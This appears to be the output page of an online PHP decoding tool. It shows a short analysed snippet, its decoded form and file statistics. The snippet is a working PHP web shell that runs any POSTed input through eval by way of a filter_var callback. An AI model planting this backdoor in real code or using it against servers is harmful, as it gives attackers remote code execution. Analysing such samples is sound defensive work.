Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function ff($s) { return eval($s); } echo filter_var($_POST['a'], FILTER_CALLBACK, ..
Decoded Output download
<?php
function ff($s)
{
return eval($s);
}
echo filter_var($_POST['a'], FILTER_CALLBACK, array("options"=>"ff"));
?>
Did this file decode correctly?
Original Code
<?php
function ff($s)
{
return eval($s);
}
echo filter_var($_POST['a'], FILTER_CALLBACK, array("options"=>"ff"));
?>
Function Calls
None |
Stats
MD5 | bed855b96614b6894b047e629cc367ba |
Eval Count | 0 |
Decode Time | 105 ms |